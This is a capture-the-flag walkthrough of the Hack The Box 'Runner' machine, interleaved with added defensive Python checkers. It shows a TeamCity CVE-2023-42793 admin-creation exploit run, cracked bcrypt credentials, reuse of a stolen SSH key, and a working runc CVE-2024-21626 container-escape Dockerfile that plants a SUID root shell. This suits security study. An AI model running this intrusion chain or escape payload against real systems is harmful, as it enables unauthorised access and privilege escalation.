HTB-Runner target machine notes

2024-09-02 16:03:43

Overview

Runner is a medium-difficulty Linux machine on HTB. It runs TeamCity with the vulnerability CVE-2023-42793, which lets an unauthenticated user bypass authentication and extract an API token, and its Docker host uses a runc version affected by the container escape CVE-2024-21626, which is used for privilege escalation.

Machine page: /machines/Runner

I. nmap scanning

1) Port scanning
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.13
Warning: 10.10.11.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.13
Host is up (0.26s latency).
Not shown: 63375 closed tcp ports (conn-refused), 2157 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

# Nmap done at Fri Aug 30 22:29:18 2024 -- 1 IP address (1 host up) scanned in 47.39 seconds
2) Detailed information scanning
nmap -sT -sV -sC -O -p22,80,8000 -o detail 10.10.11.13
Starting Nmap 7.93 (  ) at 2024-09-01 20:51 EDT
Nmap scan report for 10.10.11.13
Host is up (0.11s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to /
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds

Note the http-title line: "Did not follow redirect to" a hostname. So we bind the domain name in /etc/hosts:

sudo vi /etc/hosts

and put 10.10.11.13 followed by the domain name into it.

3) Vulnerability script scanning

sudo nmap --script=vuln -p22,80,8000 10.10.11.13 -o vuln 

II. Web penetration


Opened the homepage and looked around to collect information. Nothing useful, except perhaps the names shown on the homepage.


The remaining links, etc., all return 404 pages.

Try both directory brute-forcing and subdomain brute-forcing.

1) Directory brute-forcing

sudo gobuster dir -u  -w /usr/share/wordlists/dirb/  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 178] [--> /assets/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

2) Subdomain brute-forcing

ffuf -u  -H "HOST:" -w /usr/share/SecLists/Discovery/DNS/ -fs 154
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : 
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/DNS/
 :: Header           : Host: 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

[Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 121ms]
    * FUZZ: teamcity
The directory scan found only /assets; the subdomain scan found teamcity.

3) Analysis of the results

Clicking through the directory results gave nothing useful, but we turned up a subdomain. Write it to /etc/hosts:

echo "10.10.11.13  " | tee -a /etc/hosts

Visit it.


Tested SQL injection, password reset and so on; none of them worked. A Google search for known vulnerabilities turned up:

CVE-2023-42793 :/exploits/51884

It allows us to create an administrator user without authentication. Reading the exploit, the principle is not hard to understand: an unauthenticated request leaks the administrator's API token, and that token is then used to create a new administrator account.

Paste the code into Kali and run it without arguments to see the help:

 python                                

=====================================================
*       CVE-2023-42793                              *
*  TeamCity Admin Account Creation                  *   
*                                                   *
*  Author: ByteHunter                               *
=====================================================

usage:  [-h] -u URL [-v]
: error: the following arguments are required: -u/--url
python  -u                               

=====================================================
*       CVE-2023-42793                              *
*  TeamCity Admin Account Creation                  *   
*                                                   *
*  Author: ByteHunter                               *
=====================================================

Token: eyJ0eXAiOiAiVENWMiJ9.Z2Q5NHVFQjFpdnJqLVpvRjVueVNkWTF4WkN3.YTM5MjkwZTktNTU1MS00MzA5LThkYTUtODc2MTQ5M2MwODUx
Successfully exploited!
URL: 
Username: city_adminbsnn
Password: Main_password!!**

It created an administrator user for us: city_adminbsnn:Main_password!!**

Log in.


Go to the admin backend and download the backup file.


Download it locally and unzip it


Go through the directory. Configuration files and database files usually contain useful information; first fix the permissions:

sudo chmod -R 777 *

Searching turned up the users' hash values:


Take the credential information and process it with awk, sed, tee and similar tools, or simply copy it into a new file:

John:$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/
nspjipzg:$2a$07$NhQTyKKikNjDy4HgKBjiiuc2ftK1XelfKkNiHy.4/HjDG1qmr9w36
city_adminbwgn:$2a$07$lQsvDl0GcSMeUl95ZZWBReYJYqymfIhZf20W3gQpoRw0TFtBy875u


Identify the hash type with hashid:

cat creds | awk -F: '{print $2}'|head -n 1 | hashid
Analyzing '$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board  
[+] bcrypt 

It is bcrypt.

Find the hash mode number in hashcat:

hashcat --help| grep bcrypt
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce
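As an added example (not code from the writeup or from the exploit author), the following Python splits a bcrypt string like the ones above into its fields. The prefix $2a$07$ encodes the variant and the cost factor: cost 7 means 2^7 = 128 rounds of the expensive key setup, which is why these hashes fall to a wordlist so quickly and why a defender would want a higher cost on a TeamCity user store. The cost-10 threshold for "weak" is my assumption, not a value from the page; the sample input reuses the two hashes from the page (Matthew's is truncated exactly as on the page) plus one constructed cost-12 hash that is not a real password hash.

```python
import re

# Modular-crypt bcrypt layout: $<version>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(?P<version>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

# Assumption (not from the page): anything below cost 10 is reported as weak.
MIN_RECOMMENDED_COST = 10


def parse_bcrypt(hash_str):
    """Split a bcrypt hash into its fields; return None if it is malformed or truncated."""
    m = BCRYPT_RE.match(hash_str.strip())
    if not m:
        return None
    cost = int(m.group("cost"))
    return {
        "version": m.group("version"),
        "cost": cost,
        "iterations": 2 ** cost,  # rounds of Eksblowfish expensive key setup
        "salt": m.group("salt"),
        "digest": m.group("digest"),
        "weak_cost": cost < MIN_RECOMMENDED_COST,
    }


def audit_creds(lines):
    """Parse 'user:hash' lines (the creds file format used above) into a per-user report."""
    report = {}
    for line in lines:
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, h = line.split(":", 1)
        report[user] = parse_bcrypt(h)
    return report


# Sample input: two hashes from the page plus one constructed cost-12 entry (not a real hash).
SAMPLE_CREDS = """
John:$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/
constructed_user:$2b$12$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234
""".strip().splitlines()

if __name__ == "__main__":
    for user, info in audit_creds(SAMPLE_CREDS).items():
        if info is None:
            print(f"{user}: malformed or truncated bcrypt string")
        else:
            print(f"{user}: bcrypt {info['version']} cost={info['cost']} "
                  f"({info['iterations']} rounds) weak={info['weak_cost']}")
```

The truncated Matthew entry is reported as malformed rather than silently accepted; a cracking run on such a line would fail in the same way, so checking the field lengths first saves a wasted hashcat session.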

Brute-force the passwords:

hashcat creds /usr/share/wordlists/  --username -m 3200   

When execution completes, view the results:

hashcat creds /usr/share/wordlists/  --username -m 3200 --show
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/:piper123
a) Account information

Credentials: Matthew:piper123

Tried them over SSH and they did not work, so set them aside for now and keep looking through the backup file for anything else.

b) SSH key

Finally found an SSH key:

./config/projects/AllProjects/pluginData/ssh_keys/id_rsa

Copy it out:

cp ./config/projects/AllProjects/pluginData/ssh_keys/id_rsa ../../id_rsa

Check who it belongs to:

cat john.id_rsa | grep -v '\-' | base64 -d | strings

The plaintext contains john@runner.
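The base64 -d | strings trick works because a modern OpenSSH private key is a structured openssh-key-v1 container whose comment (usually user@host) sits in clear text when the key has no passphrase. As an added example, not from the writeup, here is a small parser for that container that reports the key type, cipher and comment, and stops without a comment when the private section is encrypted. The sample key is constructed inside the block with zero-filled placeholder key bytes, so it identifies nothing real; the comment value john@runner is reused from the page.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"
# Number of key-type-specific fields that precede the comment in the private section.
PRIVATE_FIELDS = {
    "ssh-ed25519": 2,           # public key, secret key
    "ssh-rsa": 6,               # n, e, d, iqmp, p, q
    "ecdsa-sha2-nistp256": 3,   # curve name, public point, private scalar
    "ecdsa-sha2-nistp384": 3,
    "ecdsa-sha2-nistp521": 3,
}


def _string(b):
    """Encode bytes as an SSH 'string' (uint32 big-endian length + bytes)."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf, off):
    """Decode one SSH 'string' at offset off; return (bytes, new offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def pem_to_blob(pem_text):
    """Drop the BEGIN/END armour and base64-decode the body (what grep -v '-' | base64 -d does)."""
    body = "".join(line.strip() for line in pem_text.splitlines() if not line.startswith("-----"))
    return base64.b64decode(body)


def describe_openssh_key(pem_text):
    """Return key type, cipher, KDF and, for an unencrypted key, the comment (often user@host)."""
    blob = pem_to_blob(pem_text)
    if not blob.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 container")
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    _kdfopts, off = _read_string(blob, off)
    off += 4                                    # uint32 number of keys (1 in practice)
    pubkey, off = _read_string(blob, off)
    keytype, _ = _read_string(pubkey, 0)
    private, off = _read_string(blob, off)
    info = {"keytype": keytype.decode(), "cipher": cipher.decode(),
            "kdf": kdf.decode(), "comment": None}
    if cipher != b"none":
        return info                             # private section is encrypted: no readable comment
    check1, check2 = struct.unpack(">II", private[:8])
    if check1 != check2:
        raise ValueError("check integers differ: corrupt private section")
    kt, p = _read_string(private, 8)
    nfields = PRIVATE_FIELDS.get(kt.decode())
    if nfields is None:
        return info                             # layout of this key type not handled here
    for _ in range(nfields):
        _, p = _read_string(private, p)
    comment, _ = _read_string(private, p)
    info["comment"] = comment.decode()
    return info


def build_ed25519_pem(comment, cipher="none"):
    """Constructed sample only: an openssh-key-v1 container with zero-filled placeholder key
    bytes (not a usable key). A cipher other than 'none' leaves the bytes as they are and
    merely exercises the parser's 'encrypted' branch."""
    pk, sk = bytes(32), bytes(64)
    pub = _string(b"ssh-ed25519") + _string(pk)
    private = struct.pack(">II", 0x5A5A5A5A, 0x5A5A5A5A)
    private += _string(b"ssh-ed25519") + _string(pk) + _string(sk) + _string(comment.encode())
    pad = 1
    while len(private) % 8:                     # pad with 1, 2, 3, ... to the block size
        private += bytes([pad])
        pad += 1
    blob = (MAGIC + _string(cipher.encode()) + _string(b"none") + _string(b"")
            + struct.pack(">I", 1) + _string(pub) + _string(private))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


if __name__ == "__main__":
    print(describe_openssh_key(build_ed25519_pem("john@runner")))
```

The same parser run over a real id_rsa gives the comment, and it is also the quickest way to tell whether a key found in a backup is passphrase-protected: a cipher other than none means the key material and the comment are both unreadable without the passphrase.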


Rename the key to john.id_rsa.

III. Gaining a foothold

chmod 600 john.id_rsa
ssh john@10.10.11.13 -i john.id_rsa -o EnableEscapeCommandline=yes

The option -o EnableEscapeCommandline=yes enables the ~C escape command line inside the SSH session, so that SOCKS tunnels and port forwards back to the attacking machine can be set up after the connection is established.


IV. Privilege escalation

ss -lant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -                   
tcp        0    248 10.10.11.13:22          10.10.14.11:33776       ESTABLISHED -                   
tcp        0      0 127.0.0.1:59056         127.0.0.1:8111          TIME_WAIT   -                   
tcp        0      0 127.0.0.1:41720         127.0.0.1:8111          TIME_WAIT   -                   
tcp        0      0 10.10.11.13:80          10.10.14.11:33912       ESTABLISHED -                   
tcp        0      0 172.17.0.1:54814        172.17.0.2:8111         TIME_WAIT   -                   
tcp        0      0 127.0.0.1:8111          127.0.0.1:59430         TIME_WAIT   -     
tcp        0      0 127.0.0.1:59216         127.0.0.1:8111          TIME_WAIT   -     
tcp        0      1 10.10.11.13:38340       8.8.8.8:53              SYN_SENT    -     
tcp        0      0 172.17.0.1:34338        172.17.0.2:8111         TIME_WAIT   -     
tcp        0      0 172.17.0.1:40448        172.17.0.2:8111         TIME_WAIT   -     
tcp        0      0 127.0.0.1:58786         127.0.0.1:8111          TIME_WAIT   -     
tcp        0      0 127.0.0.1:33934         127.0.0.1:8111          TIME_WAIT   -     
tcp        0      0 127.0.0.1:8111          127.0.0.1:55392         TIME_WAIT   -     
tcp        0      0 172.17.0.1:54802        172.17.0.2:8111         TIME_WAIT   -    
tcp        0      0 127.0.0.1:41716         127.0.0.1:8111          TIME_WAIT   -    
tcp        0      0 10.10.11.13:80          10.10.16.3:34523        TIME_WAIT   -    
tcp        0      0 127.0.0.1:8111          127.0.0.1:55406         TIME_WAIT   -     
tcp        0      0 172.17.0.1:54982        172.17.0.2:8111         TIME_WAIT   -     
tcp        0      0 127.0.0.1:59044         127.0.0.1:8111          TIME_WAIT   -    
tcp        0      0 127.0.0.1:8111          127.0.0.1:59436         TIME_WAIT   -  
tcp6       0      0 :::80                   :::*                    LISTEN      -     
tcp6       0      0 :::22                   :::*                    LISTEN      -     
tcp6       0      0 :::8000                 :::*                    LISTEN      -     
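Added example, not part of the original writeup: a small Python parser that reads a netstat/ss-style listing like the one above and separates loopback-only listeners from externally bound ones. The loopback-only set is exactly what becomes reachable through a pivot, and the external set should match what nmap saw from outside (22, 80, 8000), which is a useful consistency check. The sample rows are copied from the listing above.

```python
def parse_listeners(output):
    """Parse LISTEN rows from a netstat/ss-style listing into address, port and scope."""
    listeners = []
    for line in output.splitlines():
        parts = line.split()
        # Skip banners/headers and anything that is not a TCP LISTEN row.
        if len(parts) < 6 or parts[0] not in ("tcp", "tcp6") or parts[5] != "LISTEN":
            continue
        addr, port = parts[3].rsplit(":", 1)   # rsplit keeps IPv6 ':::80' intact
        loopback = addr.startswith("127.") or addr == "::1"
        listeners.append({"proto": parts[0], "addr": addr,
                          "port": int(port), "loopback": loopback})
    return listeners


def classify_ports(output):
    """Return (loopback-only ports, externally bound ports). A port bound on any
    non-loopback address counts as external even if it is also bound on 127.0.0.1."""
    ls = parse_listeners(output)
    external = {l["port"] for l in ls if not l["loopback"]}
    local_only = {l["port"] for l in ls if l["loopback"]} - external
    return sorted(local_only), sorted(external)


# Sample input: rows copied from the listing on the page (LISTEN rows plus one session).
SAMPLE_LISTING = """
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0    248 10.10.11.13:22          10.10.14.11:33776       ESTABLISHED -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::8000                 :::*                    LISTEN      -
""".strip()

if __name__ == "__main__":
    local_only, external = classify_ports(SAMPLE_LISTING)
    print("loopback-only:", local_only)
    print("externally bound:", external)
```

On the listing above this yields 53, 5005, 8111, 9000 and 9443 as loopback-only and 22, 80 and 8000 as externally bound, matching the earlier nmap result; 8111 is the TeamCity port that nginx fronts on 80, and 9000 is the management page examined next.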

A number of ports are listening on localhost only. Build a SOCKS tunnel over SSH and visit them.

In the SSH session, press ~C to enter the SSH escape command line.


Pressing Enter twice leaves the escape prompt without terminating the SOCKS proxy.

Configure the SOCKS proxy 127.0.0.1:1080 in the browser on Kali; after that the target's internal resources can be accessed. I use FoxyProxy here; use whatever you prefer. Set it up and you are good to go.

Port 9000 turns out to be a Docker management page.


Login required

The credentials Matthew:piper123 obtained in section II were not SSH credentials, so try them here.


Login successful.

Now that we have the Docker panel, check the runc version:

runc --version

runc version 1.1.7-0ubuntu1~22.04.1
spec: 1.0.2-dev
 go: go1.18.1
libseccomp: 2.5.3

This version is affected by a container escape vulnerability:

CVE-2024-21626:/blog/leaky-vessels-container-escape-vulnerabilities#cve-2024-21626-5

/files/176993/runc-1.1.

In simple terms:

runc mishandles file descriptors: a leaked file descriptor lets a newly created container process inherit a working directory in the host filesystem namespace, which gives the container process access to the host filesystem and leads to a container escape.

Understanding this vulnerability and the state of the target: we cannot build or run Docker images from john's shell on the target, but we can create containers and images from the Portainer panel.

Create the folder as john on the target machine:

mkdir -p /tmp/lingx5
cp /bin/bash /tmp/lingx5/bash

Fill in the following Dockerfile:

FROM ubuntu:latest
WORKDIR /proc/self/fd/8
RUN cd ../../../../../../../../ && \
    chmod -R 777 /tmp/lingx5 && \
    chown -R root:root /tmp/lingx5 && \
    chmod u+s /tmp/lingx5/bash
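Added example (not the writeup's code): a defender-side check that covers both the runc --version output above and the Dockerfile just shown. It parses the runc version and compares it against 1.1.12, the first upstream release that contains the CVE-2024-21626 fix (a fact from the runc advisory, not from this page), and it scans a Dockerfile for the two indicators this technique depends on: a WORKDIR under /proc/self/fd/ and a RUN instruction that immediately climbs out of the working directory with repeated ../. That is the kind of rule a build hook or CI policy check would apply to images submitted through a panel such as Portainer. Distributions sometimes backport fixes without bumping the version string, so the version verdict is a prompt to read the distro advisory rather than proof. The sample inputs are the page's own runc output and Dockerfile.

```python
import re

# First upstream runc release with the CVE-2024-21626 fix (from the runc advisory, not this page).
RUNC_FIXED = (1, 1, 12)
VERSION_RE = re.compile(r"runc version (\d+)\.(\d+)\.(\d+)")
PROC_FD_RE = re.compile(r"/proc/self/fd/\d+")
CLIMB_RE = re.compile(r"\bcd\s+(?:\.\./){3,}")


def parse_runc_version(output):
    """Extract (major, minor, patch) from `runc --version`; distro suffixes such as
    -0ubuntu1~22.04.1 are ignored."""
    m = VERSION_RE.search(output)
    return tuple(int(x) for x in m.groups()) if m else None


def runc_below_fix(output, fixed=RUNC_FIXED):
    """True when the reported upstream version predates the fixed release."""
    v = parse_runc_version(output)
    if v is None:
        raise ValueError("no runc version found in output")
    return v < fixed


def logical_lines(text):
    """Join backslash-continued lines so a multi-line RUN is inspected as one instruction.
    Returns (first physical line number, joined instruction) pairs."""
    out, buf, start = [], [], None
    for n, raw in enumerate(text.splitlines(), 1):
        if start is None:
            start = n
        line = raw.rstrip()
        if line.endswith("\\"):
            buf.append(line[:-1].strip())
            continue
        buf.append(line.strip())
        out.append((start, " ".join(buf)))
        buf, start = [], None
    if buf:
        out.append((start, " ".join(buf)))
    return out


def dockerfile_findings(text):
    """Flag a WORKDIR under /proc/self/fd/<n> and a RUN that climbs out via repeated ../."""
    findings = []
    for lineno, instr in logical_lines(text):
        word = instr.split(" ", 1)[0].upper() if instr else ""
        if word == "WORKDIR" and PROC_FD_RE.search(instr):
            findings.append((lineno, "WORKDIR points into /proc/self/fd"))
        elif word == "RUN" and CLIMB_RE.search(instr):
            findings.append((lineno, "RUN climbs out of the working directory via ../"))
    return findings


# Sample inputs copied from the page: the runc version output and the Dockerfile.
SAMPLE_RUNC_OUTPUT = """runc version 1.1.7-0ubuntu1~22.04.1
spec: 1.0.2-dev
go: go1.18.1
libseccomp: 2.5.3"""

SAMPLE_DOCKERFILE = """FROM ubuntu:latest
WORKDIR /proc/self/fd/8
RUN cd ../../../../../../../../ && \\
    chmod -R 777 /tmp/lingx5 && \\
    chown -R root:root /tmp/lingx5 && \\
    chmod u+s /tmp/lingx5/bash
"""

if __name__ == "__main__":
    print("runc below fixed release:", runc_below_fix(SAMPLE_RUNC_OUTPUT))
    for lineno, msg in dockerfile_findings(SAMPLE_DOCKERFILE):
        print(f"line {lineno}: {msg}")
```

On the page's inputs the version check reports 1.1.7 as below the fixed release and the Dockerfile scan flags line 2 (WORKDIR) and line 3 (the RUN that climbs out). A clean Dockerfile with an ordinary WORKDIR produces no findings, so the check is cheap enough to run on every image build request.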


Click "build image" below.

All this does is give /tmp/lingx5/bash the SUID bit.


The build succeeded, so /tmp/lingx5/bash should now have been given SUID privileges.

Execute:

/tmp/lingx5/bash -p

Root privileges obtained.

cat /root/

Summary

  1. Port discovery with nmap found ports 22, 80 and 8000 open.
  2. On port 80, directory brute-forcing turned up very little, so we moved on to subdomain brute-forcing, which found the teamcity subdomain. A Google search for public vulnerabilities turned up CVE-2023-42793, which we used to create an admin user. After logging in we found a backup function, downloaded the backup locally, and while rummaging through it found the credentials matthew:piper123 and an SSH key for john.
  3. After using the key to gain a foothold as john and looking at the services running locally, most of which listen only on localhost, we built a SOCKS tunnel over SSH and found the Docker management service on port 9000.
  4. Using the credentials matthew:piper123 to log into that backend, we checked the runc version, found it was affected by the CVE-2024-21626 container escape, and reproduced the key steps of that technique to escalate to root.